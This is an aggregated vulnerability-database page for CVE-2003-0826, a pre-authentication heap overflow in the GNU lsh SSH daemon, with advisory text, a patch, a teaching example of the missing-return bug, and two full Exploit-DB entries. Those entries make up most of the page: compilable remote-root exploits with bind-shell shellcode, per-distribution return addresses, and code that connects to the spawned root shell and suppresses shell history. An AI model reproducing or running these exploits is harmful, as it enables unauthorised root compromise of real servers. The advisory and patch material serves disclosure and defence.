CVE-2003-0826
CVSS 7.5
Published: 2003-10-06 00:00:00
Last revised: 2016-10-17 22:37:41

[Original] lsh daemon (lshd) does not properly return from certain functions in (1) read_line.c, (2) channel_commands.c, or (3) client_keyexchange.c when long input is provided, which could allow remote attackers to execute arbitrary code via a heap-based buffer overflow attack.


[CNNVD] LSH Remote Buffer Overflow Vulnerability (CNNVD-200310-007)

        
        Lsh is a GNU implementation of the SSH protocol.
        Lsh contains a buffer overflow; a remote attacker can exploit it to execute arbitrary commands on the system with root privileges.
        The problem lies in the liboop library used by lsh. It can be triggered before authentication, so any attacker who submits specially crafted data can execute arbitrary commands on the system with root privileges.
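The defect class behind this record, as the MITRE description puts it, is a function that detects an over-long line, raises an error, and then "does not properly return", so the over-long data is processed anyway. The temporary patch under Advisories and Patches below is exactly one added `return` after the "Line too long." exception. The following is an added example, not lsh code: a small line reader with both control flows, where the downstream consumer only records what it was handed instead of copying into a fixed buffer, so the fall-through is observable without corrupting memory. The names `line_reader`, `on_line`, `on_error`, `MAX_LINE` and the 64-byte limit are this example's own assumptions.

```c
/*
 * Added example modelling the control-flow defect in CVE-2003-0826.
 * Not lsh code: names, the 64-byte limit and the inputs are constructed.
 */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_LINE 64   /* constructed limit; lsh's real limit is not given on this page */

/* What the downstream handlers observed, so a test can inspect it. */
struct reader_state {
    int errors;          /* times the too-long error was raised */
    int lines_delivered; /* lines that reached the consumer */
    size_t last_len;     /* length of the last line handed to the consumer */
};

/* Stand-in for the consumer that, in a real daemon, copies the line into a
 * fixed-size buffer. Here it only records the length, so an over-long line
 * is visible rather than a heap overflow. */
static void on_line(struct reader_state *st, const char *line, size_t len)
{
    (void)line;
    st->lines_delivered++;
    st->last_len = len;
}

/* Stand-in for EXCEPTION_RAISE: it reports and returns to the caller, which
 * must decide to stop processing. */
static void on_error(struct reader_state *st, const char *msg)
{
    (void)msg;
    st->errors++;
}

/* Consume up to `available` bytes of input and return how many were consumed.
 * `fixed` selects the patched control flow (early return after the error). */
static size_t line_reader(struct reader_state *st, const char *data,
                          size_t available, int fixed)
{
    const char *nl = memchr(data, '\n', available);
    size_t len = nl ? (size_t)(nl - data) : available;

    if (len > MAX_LINE) {
        on_error(st, "Line too long.");
        if (fixed)
            return available;   /* the patch: stop here, discard the input */
        /* vulnerable flow: falls through and still delivers the line */
    }
    on_line(st, data, len);
    return nl ? len + 1 : available;
}

/* Feed one constructed 298-byte line through the chosen version. */
static void run_overlong(int fixed, struct reader_state *st)
{
    char input[300];
    memset(st, 0, sizeof *st);
    memset(input, 'A', sizeof input - 1);
    input[sizeof input - 2] = '\n';
    input[sizeof input - 1] = '\0';
    line_reader(st, input, sizeof input - 1, fixed);
}

/* Over-long lines that reached the consumer: 1 for vulnerable, 0 for fixed. */
static int overlong_lines_delivered(int fixed)
{
    struct reader_state st;
    run_overlong(fixed, &st);
    return st.last_len > MAX_LINE ? st.lines_delivered : 0;
}

/* Both versions raise the error exactly once; only the return differs. */
static int overlong_errors_raised(int fixed)
{
    struct reader_state st;
    run_overlong(fixed, &st);
    return st.errors;
}

/* A normal line is unaffected by the patch: returns bytes consumed (6). */
static size_t short_line_consumed(void)
{
    struct reader_state st = {0, 0, 0};
    const char *input = "hello\nrest";   /* constructed */
    return line_reader(&st, input, strlen(input), 1);
}

int main(void)
{
    printf("vulnerable: %d over-long line(s) delivered, %d error(s)\n",
           overlong_lines_delivered(0), overlong_errors_raised(0));
    printf("fixed:      %d over-long line(s) delivered, %d error(s)\n",
           overlong_lines_delivered(1), overlong_errors_raised(1));
    return 0;
}
```

The point the two runs make is that the error is raised in both versions; what turns the check into a vulnerability is that the unpatched reader keeps executing the code meant only for lines that passed it. When reviewing error paths in similar C code, look for a raise or log call that is not followed by a `return`, `goto cleanup` or equivalent.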
        

- CVSS (Base Score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:gnu:lsh:1.4      GNU lsh 1.4
cpe:/a:gnu:lsh:1.4.2    GNU lsh 1.4.2
cpe:/a:gnu:lsh:1.4.1    GNU lsh 1.4.1

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0826
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0826
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-007
(official data source) CNNVD

- Other Links and Resources

http://bugs.debian.org/211662
(UNKNOWN)  CONFIRM  http://bugs.debian.org/211662
http://lists.grok.org.uk/pipermail/full-disclosure/2003-September/010496.html
(UNKNOWN)  FULLDISC  20030919 lsh patch (was Re: [Full-Disclosure] new ssh exploit?)
http://lists.lysator.liu.se/pipermail/lsh-bugs/2003q3/000120.html
(UNKNOWN)  CONFIRM  http://lists.lysator.liu.se/pipermail/lsh-bugs/2003q3/000120.html
http://marc.info/?l=bugtraq&m=106398939512178&w=2
(UNKNOWN)  BUGTRAQ  20030919 Remote root vuln in lsh 1.4.x
http://marc.info/?l=bugtraq&m=106407188509874&w=2
(UNKNOWN)  BUGTRAQ  20030920 LSH: Buffer overrun and remote root compromise in lshd
http://www.debian.org/security/2005/dsa-717
(UNKNOWN)  DEBIAN  DSA-717

- Vulnerability Information

LSH Remote Buffer Overflow Vulnerability
High severity    Boundary condition error
2003-10-06 00:00:00 2005-10-20 00:00:00
Remote
        
        Lsh is a GNU implementation of the SSH protocol.
        Lsh contains a buffer overflow; a remote attacker can exploit it to execute arbitrary commands on the system with root privileges.
        The problem lies in the liboop library used by lsh. It can be triggered before authentication, so any attacker who submits specially crafted data can execute arbitrary commands on the system with root privileges.
        

- Advisories and Patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Temporary patch:
        --- src/read_line.c 16 Feb 2003 21:30:11 -0000 1.31
        +++ src/read_line.c 18 Sep 2003 20:02:48 -0000
        @@ -100,6 +100,7 @@
        /* Too long line */
        EXCEPTION_RAISE(self->e,
        make_protocol_exception(0, "Line too long."));
        + return available;
        }
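        Review bot: this fragment will not apply with `patch` as shown: the four context lines have lost their leading space marker and the header `@@ -100,6 +100,7 @@` promises six and seven lines where only five are visible, so treat it as documentation of the change and take the real diff from the lsh-1.4.2-1.4.3.diff.gz listed under the vendor patch. The change itself is the single added `return available;` after `EXCEPTION_RAISE(self->e, make_protocol_exception(0, "Line too long."));`, which stops the reader from falling through and continuing to handle the over-long line after the error has been raised. It touches only src/read_line.c, whereas the CVE description also names channel_commands.c and client_keyexchange.c, so the vendor 1.4.3 and 1.5.3 releases should be preferred over this temporary patch.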
        Vendor patch:
        GNU
        ---
        The vendor has released an upgrade to fix this security issue; download it from the vendor's home page:

        http://www.lysator.liu.se/~nisse/archive/lsh-1.4.3.tar.gz
        http://www.lysator.liu.se/~nisse/archive/lsh-1.4.2-1.4.3.diff.gz
        http://www.lysator.liu.se/~nisse/archive/lsh-1.5.3.tar.gz
        ftp://ftp.lysator.liu.se/pub/security/lsh/lsh-1.4.3.tar.gz
        ftp://ftp.lysator.liu.se/pub/security/lsh/lsh-1.4.2-1.4.3.diff.gz
        ftp://ftp.lysator.liu.se/pub/security/lsh/lsh-1.5.3.tar.gz

- Vulnerability Information (23161)

LSH 1.x Remote Buffer Overflow Vulnerability (1) (EDBID:23161)
linux remote
2003-09-19 Verified
0 Carl Livitt
N/A
source: http://www.securityfocus.com/bid/8655/info

lsh has been reported prone to a remote buffer overflow vulnerability. The condition is reported to present itself in fairly restrictive circumstances, and has been reported to be exploitable pre-authentication. Successful exploitation could result in the execution of arbitrary attacker supplied instructions in the context of the affected daemon. 

/*
  --------------------------------------
  Remote r00t exploit for lsh 1.4.x
  by Haggis aka Carl Livitt - carl.learningshophull@co@uk
  19/09/2003

  Latest version should always be available from
  http://doris.scriptkiddie.net
  ------------------------------------

  Spawns bindshell on port 12345 of remote host.

  Handily, it also bypasses non-exec stack protection as the
  shellcode is on the heap.

  NOTE: This exploit _only_ works if it's the first thing to
  connect to the lshd daemon after it has been started.
  Any other time, it is just a DoS. Run it a few times against
  a host running lshd to see what I mean.


  --------------------------------------------
  Determining RET address for a new platform:
  ------------------------------------------

  Start up 'lshd --daemonic', attach gdb to it and 'c'ontinue:

	sol:~ # rm /var/run/lshd.pid ; lshd --daemonic ; gdb -q lshd `pgrep lshd`
	Attaching to program: /usr/local/sbin/lshd, process 7140
	Reading symbols from /lib/libpam.so.0...done.
	Loaded symbols for /lib/libpam.so.0
	Reading symbols from /lib/libutil.so.1...done.
	Loaded symbols for /lib/libutil.so.1
	Reading symbols from /lib/libnsl.so.1...done.
	Loaded symbols for /lib/libnsl.so.1
	Reading symbols from /lib/libcrypt.so.1...done.
	Loaded symbols for /lib/libcrypt.so.1
	Reading symbols from /lib/libz.so.1...done.
	Loaded symbols for /lib/libz.so.1
	Reading symbols from /usr/local/lib/liboop.so.4...done.
	Loaded symbols for /usr/local/lib/liboop.so.4
	Reading symbols from /usr/lib/libgmp.so.3...done.
	Loaded symbols for /usr/lib/libgmp.so.3
	Reading symbols from /lib/libc.so.6...done.
	Loaded symbols for /lib/libc.so.6
	Reading symbols from /lib/libdl.so.2...done.
	Loaded symbols for /lib/libdl.so.2
	Reading symbols from /lib/ld-linux.so.2...done.
	Loaded symbols for /lib/ld-linux.so.2
	Reading symbols from /lib/libnss_files.so.2...done.
	Loaded symbols for /lib/libnss_files.so.2
	0x40157d37 in fork () from /lib/libc.so.6
	(gdb) c
	Continuing.

  Switch to another terminal, and run the exploit against the lsh
  server, specifying target number 3 (Test):

	haggis@sol:~/exploits/research/lsh> ./lsh_exploit -t localhost -T 3
	LSH 1.4.x (others?) exploit by Haggis (haggis@haggis.kicks-ass.net)

	[-] Building exploit buffer...
	[-] Sending exploit string...
	[-] Sleeping...
	[-] Connecting to bindshell...
	[*] Could not connect to localhost - the exploit failed

  Switch back to your other terminal. You will see:

	Program received signal SIGSEGV, Segmentation fault.
	0x41424344 in ?? ()


  Type 'x/1000x $eax':

	(gdb) x/1000x $eax

  And wait until you find lines similar to these:

	0x809fa68:      0x90909090      0x90909090      0x90909090      0x90909090
	0x809fa78:      0x90909090      0x90909090      0x90909090      0x90909090
	0x809faa8:      0x90909090      0x90909090      0x90909090      0x90909090
	0x809fa9c:      0x90909090      0x90909090      0x90909090      0x90909090
	^^^^^^^^^

  Any of the addresses that contains a NOP (0x90) can be used as your RET address.
  Create a new target in the source-code and Bob's-yer-uncle!
*/

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <time.h>
#include <stdarg.h>

#define SSH_PORT 22
#define BINDSHELL_PORT 12345
#define SIZ 8092
#define EXPLOIT_BUF_SIZE 4000 	// just approximate - works well enough
#define NOPS_LEN 1024

/*
 * Linux shellcode - binds /bin/sh to a port
 *
 * Claes M. Nyberg 20020620
 *
 * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
 */
char shellcode[]=
"\x83\xec\x10\x89\xe7\x31\xc0\x50\x50\x50\x66\x68\x30\x39\xb0\x02\x66\x50"
"\x89\xe6\x6a\x06\x6a\x01\x6a\x02\x89\xe1\x31\xdb\x43\x30\xe4\xb0\x66\xcd"
"\x80\x89\xc5\x6a\x10\x56\x55\x89\xe1\x43\x31\xc0\xb0\x66\xcd\x80\x50\x55"
"\x89\xe1\xb3\x04\xb0\x66\xcd\x80\xb0\x10\x50\x54\x57\x55\x89\xe1\xb3\x05"
"\xb0\x66\xcd\x80\x89\xc3\x31\xc9\x31\xc0\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd"
"\x80\x41\xb0\x3f\xcd\x80\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80";

struct
{
	char *platform;
	unsigned long retAddr;
} targets[]= {
	{ "SuSE 8.1   - LSH v1.4.x (default)", 0x0809fb20},
	{ "RedHat 7.3 - LSH v1.4.x", 0x0809de90},
	{ "RedHat 8.0 - LSH v1.4.x", 0x0809a9d8},
	{ "Test. RET address = 0x41424344", 0x41424344},
	NULL
};

void my_send(int, char *, ...);
void my_recv(int);
int connect_to_host(int);
void my_sleep(int n);
int do_bind_shell();

struct hostent *hostStruct;
char buf[SIZ], host[SIZ]="\0";
int useTarget=0;
char usage[]=
"Usage: ./lsh_exploit -t host_name [-T platform_type]\n";

main(int argc, char **argv)
{
	int ch, i, targetSock;
	unsigned long *retPtr;
	char *charRetPtr;

	printf("LSH 1.4.x (others?) exploit by Haggis (haggis@haggis.kicks-ass.net)\n\n");
	while((ch=getopt(argc, argv, "t:T:h"))!=-1) {
		switch(ch) {
			case 't':
				strncpy(host, optarg, SIZ-1);
				break;
			case 'T':
				useTarget=atoi(optarg);
				break;
			case 'h':
			default:
				printf("%s\n",usage);
				printf("Available platforms:\n");
				for(i=0;targets[i].platform;i++)
					printf(" %2d. %s\n", i, targets[i].platform);
				printf("\n");
				exit(0);
				break;
		}
	}

	if(host[0]=='\0') {
		printf("[*] You must specify a host! Use -h for help\n");
		exit(1);
	}
	if((hostStruct=gethostbyname(host))==NULL) {
		printf("[*] Couldn't resolve host %s\nUse '%s -h' for help\n", host,argv[0]);
		exit(1);
	}
	if((targetSock=connect_to_host(SSH_PORT))==-1) {
		printf("[*] Coulnd't connect to host %s\n", host);
		exit(1);
	}
	my_recv(targetSock);

	printf("[-] Building exploit buffer...\n");

	retPtr=(unsigned long *)buf;
	for(i=0;i<EXPLOIT_BUF_SIZE/4;i++)
		*(retPtr++)=targets[useTarget].retAddr;

	charRetPtr=(unsigned char *)retPtr;
	for(i=0;i<NOPS_LEN-strlen(shellcode);i++)
		*(charRetPtr++)=(unsigned long)0x90;

	memcpy(charRetPtr, shellcode, strlen(shellcode));
	*(charRetPtr+strlen(shellcode))='\n';
	*(charRetPtr+strlen(shellcode)+1)='\0';

	printf("[-] Sending exploit string...\n");
	my_send(targetSock, buf);
	close(targetSock);

	printf("[-] Sleeping...\n");
	my_sleep(100000);

	printf("[-] Connecting to bindshell...\n");
	if(do_bind_shell()==-1)
		printf("[*] Could not connect to %s - the exploit failed\n", host);

	exit(0);
}

int do_bind_shell()
{
	fd_set rfds;
	int sock,retVal,r;

	if((sock=connect_to_host(BINDSHELL_PORT))==-1)
		return -1;

	printf("[-] Success!!! You should now be r00t on %s\n", host);
	do {
		FD_ZERO(&rfds);
		FD_SET(0, &rfds);
		FD_SET(sock, &rfds);
		retVal=select(sock+1, &rfds, NULL, NULL, NULL);
		if(retVal) {
			if(FD_ISSET(sock, &rfds)) {
				buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad!
				printf("%s", buf);
			}
			if(FD_ISSET(0, &rfds)) {
				buf[(r=read(0, buf, SIZ-1))]='\0'; // bad!
				send(sock, buf, strlen(buf), 0);
			}

		}
	} while(retVal && r); // loop until connection terminates

	close(sock);
	return 1;
}

// Given a port number, connects to an already resolved hostname...
// connects a TCP stream and returns a socket number (or returns error)
int connect_to_host(int p)
{
	int sock;
	struct sockaddr_in saddr;

	if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
		return -1;
	memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
	saddr.sin_family=AF_INET;
	saddr.sin_addr.s_addr=*((unsigned long *)hostStruct->h_addr_list[0]);
	saddr.sin_port=htons(p);
	if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
		close(sock);
		return -1;
	} else
	return sock;
}


// Handy little function to send formattable data down a socket.
void my_send(int s, char *b, ...)
{
	va_list ap;
	char *buf;

	va_start(ap,b);
	vasprintf(&buf,b,ap);
	send(s,buf,strlen(buf),0);
	va_end(ap);
	free(buf);
}


// Another handy function to read data from a socket.
void my_recv(int s)
{
	int len;
	char buf[SIZ];

	len=recv(s, buf, SIZ-1, 0);
	buf[len]=0;
}


// Wrapper for nanosleep()... just pass 'n' nanoseconds to it.
void my_sleep(int n)
{
	struct timespec t;
	t.tv_sec=0;
	t.tv_nsec=n;
	nanosleep(&t,&t);
}


		

- Vulnerability Information (23162)

LSH 1.x Remote Buffer Overflow Vulnerability (2) (EDBID:23162)
linux remote
2003-09-19 Verified
0 m00 security
N/A
source: http://www.securityfocus.com/bid/8655/info
 
lsh has been reported prone to a remote buffer overflow vulnerability. The condition is reported to present itself in fairly restrictive circumstances, and has been reported to be exploitable pre-authentication. Successful exploitation could result in the execution of arbitrary attacker supplied instructions in the context of the affected daemon. 

/* m00-lshd22.c
 *
 *  lshd 1.3-1.5 remote root exploit by m00 security // www.m00.ru
 *
 *  Binds shell on port 61200.
 *  Based on lsh_exploit.c by Haggis aka Carl Livitt // doris.scriptkiddie.net
 *
 *  Available targets:
 *    SuSE 8.1 - LSH v1.4 (heap)
 *    RedHat 7.3 - LSH v1.3.* (stack)
 *    RedHat 7.3 - LSH v1.4 (heap)
 *    RedHat 7.3 - LSH v1.4 (stack)
 *    RedHat 8.0 - LSH v1.4 (heap)
 *    RedHat 9.0 - LSH v1.4 (heap)
 *    RedHat 9.0 - LSH v1.4 (stack)
 *    Mandrake 9.0 - LSH v1.4 (stack)
 *    Mandrake 9.1 - LSH v1.3.* (heap)
 *    Mandrake 9.1 - LSH v1.3.* (heap)
 *    Mandrake 9.1 - LSH v1.3.* (stack)
 *    Mandrake 9.1 - LSH v1.4 (heap)
 *    Mandrake 9.1 - LSH v1.4 (stack)
 *    Mandrake 9.1 - LSH v1.5 (heap)
 *    Mandrake 9.1 - LSH v1.5 (stack)
 *
 *  Difference between heap and stack RET-addresses:
 *    Useing heap retaddr allows to bypass non-execute stack protection,
 *    but possibility of success exploitation is only about 30% :( cuz our
 *    data in heap doesn't have constant disposition.
 *    Stack r0cz ;D
 *
 *  Testing:
 *    sh-2.05b$ ./explshd localhost 12
 *
 *    lshd 1.3-1.5 remote root exploit by m00 security // www.m00.ru
 *
 *    [~] Connecting to localhost:22... OK
 *    [~] Waiting for lshd response...  OK
 *    => SSH-2.0-lshd_1.4.2 lsh - a free ssh
 *    [~] Building and sending exploit buffer... OK
 *    [~] Sleeping...
 *    [~] Trying to connect to bindshell... OK
 *    [+] Shell spawned! w00t!!!
 *
 *    uid=0(root) gid=0(root) groups=0(root)
 *    Linux localhost 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686 unknown unknown GNU/Linux
 *    20:29:44 up  2:29,  3 users,  load average: 0.04, 0.09, 0.11
 *
 *  Greets to:
 *    - nerF security team // www.nerf.ru
 *    - LimpidByte // lbyte.sysdrop.org
 *    - priv8security (especially to wsxz =)) // www.priv8security.com
 *    - UHAGr // www.uhagr.com
 *    - ech0 // x25.cc
 *    - ppl from EFnet@m00sec and #nerf
 *
 *  Authors:
 *    - Over_G // overg[at]mail.ru
 *    - d4rkgr3y // d4rk[at]securitylab.ru
 *
 *  Released 29/09/03 // www.m00.ru
*/

#include <string.h>
#include <unistd.h>
#include <netdb.h>


struct
{
	char *platform;
	unsigned long ret;
	int elen;
	int nlen;
}

targets[]=
{
	{ "SuSE 8.1 - LSH v1.4 (heap)", 0x0809f030, 1536, 1600},
	{ "RedHat 7.3 - LSH v1.3.* (stack)", 0xbffff07c, 876, 726}, // tested on 1.4.2 rpm
	{ "RedHat 7.3 - LSH v1.4 (heap)", 0x0809d620, 1536, 1600},
	{ "RedHat 7.3 - LSH v1.4 (stack)", 0xbfffc710, 876, 726}, // tested on 1.4.2 rpm
	{ "RedHat 8.0 - LSH v1.4 (heap)", 0x0809a9d8, 4000, 1024},
	{ "RedHat 9.0 - LSH v1.4 (heap)", 0x0809a0ee, 876, 726},
	{ "RedHat 9.0 - LSH v1.4 (stack)", 0xbfffc48c, 876, 726}, //  tested on 1.4.2 rpm
//	{ "Mandrake 8.2 - LSH v1.4 (stack)", 0x00000000, 0, 0}, // non-exploitable
	{ "Mandrake 9.0 - LSH v1.4 (stack)", 0xbfffc5b1, 876, 726}, // tested on 1.4.2 src
	{ "Mandrake 9.1 - LSH v1.3.* (heap)", 0x809bc90, 3500, 500},
	{ "Mandrake 9.1 - LSH v1.3.* (heap)", 0x809bc90, 3500, 500},
	{ "Mandrake 9.1 - LSH v1.3.* (stack)", 0xbffff07c, 3500, 500}, // tested on 1.3.2 rpm
	{ "Mandrake 9.1 - LSH v1.4 (heap)", 0x080a5660, 876, 726},
	{ "Mandrake 9.1 - LSH v1.4 (stack)", 0xbfffc5cc, 876, 726}, // tested on 1.4.2 src
	{ "Mandrake 9.1 - LSH v1.5 (heap)", 0x80a8540, 1536, 1600},
	{ "Mandrake 9.1 - LSH v1.5 (stack)", 0xbfffe1cc, 1536, 1600}, // tested on 1.5.57 rpm
	{ "Denial-of-Service attack", 0xdefaced, 3000, 500},
	NULL
};

// linux x86 shellcode by eSDee of Netric (www.netric.org)
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc1\x31\xc0\x31\xdb\x50\x50"
"\x50\x66\x68\xef\x10\xb3\x02\x66"
"\x53\x89\xe2\xb3\x10\x53\xb3\x02"
"\x52\x51\x89\xca\x89\xe1\xb0\x66"
"\xcd\x80\x31\xdb\x39\xc3\x74\x05"
"\x31\xc0\x40\xcd\x80\x31\xc0\x50"
"\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
"\x80\x89\xd7\x31\xc0\x31\xdb\x31"
"\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
"\x80\x31\xc0\x31\xdb\x50\x50\x57"
"\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
"\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
"\xcd\x80\x39\xc3\x75\x40\x31\xc0"
"\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
"\x31\xc9\x89\xf3\xb0\x3e\xfe\xc0\xcd\x80"
"\x31\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31"
"\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x8b\x54\x24"
"\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
"\x80\x31\xc0\x40\xcd\x80\x31\xc0"
"\x89\xf3\xb0\x06\xcd\x80\xeb\x99";

struct hostent *hostSct;
char buf[0x7a69]="\0";

main(int argc, char **argv)
{
	int sock,ch,i,ss,targetSock;
	unsigned long *retPtr;
	char *charRetPtr;
	int port = 22;

	printf("\nlshd 1.3-1.5 remote root exploit by m00 security // www.m00.ru\n\n");
	if (argc < 3) {
		printf("Incorrect parameters. Usage: %s <target host> <target type> [port (22 default)]\n\nWhere 'target type' is:\n\n",argv[0]);
		for(i=0;targets[i].platform;i++) {
			printf("\r%i %s\n", i, targets[i].platform);
		}
		printf("\n");
		exit(0);
	} else {
		ss = atoi(argv[2]);
		if(argv[3]) { port = atoi(argv[3]); }
	}

	if((hostSct=gethostbyname(argv[1]))==NULL) {
		printf("[-] Couldn't resolve host %s\n", argv[1]);
		exit(1);
	}

	printf("[~] Connecting to %s:%i...", argv[1],port);
	if((targetSock=connect_to_host(port))==-1) {
		printf(" failed\n");
		exit(1);
	}
	printf(" OK\n");

	printf("[~] Waiting for lshd response... ");
	recv(targetSock, buf, 8095, 0);
	printf(" OK\n");

	printf("=> %s",buf);
	printf("[~] Building and sending exploit buffer...");
	retPtr=(unsigned long *)buf;
	for(i=0;i<targets[ss].elen;i++) {
		*(retPtr++) = targets[ss].ret; //RET
	}
	for(i=0;i<targets[ss].nlen;i++) {
		*(retPtr++)=(unsigned long)0x90909090;
	}
	charRetPtr=(unsigned char *)retPtr;
	memcpy(charRetPtr, shellcode, strlen(shellcode));
	*(charRetPtr+strlen(shellcode))='\n';
	send(targetSock,buf,strlen(buf),0);
	close(targetSock);

	printf(" OK\n[~] Sleeping...\n");
	sleep(1);
	printf("[~] Trying to connect to bindshell...");
	if((sock=connect_to_host(61200))==-1)
		printf(" error\n[-] Could not connect to %s:61200 - exploit failed\n\n", argv[1]);
	else {
		printf(" OK\n[+] Shell spawned! w00t!!!\n\n");
		send(sock,"export HISTFILE=/dev/null;id;uname -a;uptime;\n",46,0);
		get_shell(sock);
	}
	exit(0);
}


int get_shell(int sock)
{
	fd_set rfds;
	int retVal,r;

	do {
		FD_ZERO(&rfds);
		FD_SET(0, &rfds);
		FD_SET(sock, &rfds);
		retVal=select(sock+1, &rfds, NULL, NULL, NULL);
		if(retVal) {
			if(FD_ISSET(sock, &rfds)) {

				buf[(r=recv(sock, buf, 8095,0))]='\0';
				printf("%s", buf);
			}
			if(FD_ISSET(0, &rfds)) {
				buf[(r=read(0, buf, 8095))]='\0';
				send(sock, buf, strlen(buf), 0);
			}
		}
	} while(retVal && r);

	close(sock);
	return 1;
}

int connect_to_host(int port)
{
	int sockt;
	struct sockaddr_in saddr;

	if((sockt=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
		return -1;
	memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
	saddr.sin_family=AF_INET;
	saddr.sin_addr.s_addr=*((unsigned long *)hostSct->h_addr_list[0]);
	saddr.sin_port=htons(port);
	if(connect(sockt, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
		close(sockt);
		return -1;
	} else
	return sockt;
}
// m00000000000oooooooooooooooo

		

- Vulnerability Information

11744
LSH Daemon lshd Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Vendor Verified

- Vulnerability Description

- Timeline

2003-09-20 Unknown
Unknown Unknown

- Solution

Upgrade to version 1.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

LSH Remote Buffer Overflow Vulnerability
Boundary Condition Error 8655
Yes No
2003-09-19 12:00:00 2009-07-11 11:56:00
Discovery of this vulnerability has been credited to Carl Livitt.

- Affected Program Versions

GNU lsh 1.5
GNU lsh 1.4.2
GNU lsh 1.4.1
GNU lsh 1.4
GNU lsh 1.3.5
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0

- Vulnerability Discussion

lsh has been reported prone to a remote buffer overflow vulnerability. The condition is reported to present itself in fairly restrictive circumstances, and has been reported to be exploitable pre-authentication. Successful exploitation could result in the execution of arbitrary attacker supplied instructions in the context of the affected daemon.

- Exploit

The following proof of concept exploit has been supplied:

- Solution

SuSE has released advisory SuSE-SA:2003:041 to address this issue. See referenced advisory for fix information.

Debian has released advisory DSA 717-1 to address this issue. Please see the referenced advisory for further information on obtaining and applying fixes.

GNU lsh 1.3.5
GNU lsh 1.4.2
GNU lsh 1.5
Debian Linux 3.0 s/390
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0 mips
Debian Linux 3.0 mipsel
Debian Linux 3.0 m68k
Debian Linux 3.0 sparc
Debian Linux 3.0 ppc
Debian Linux 3.0 hppa
Debian Linux 3.0
Debian Linux 3.0 ia-32

- References

 

 
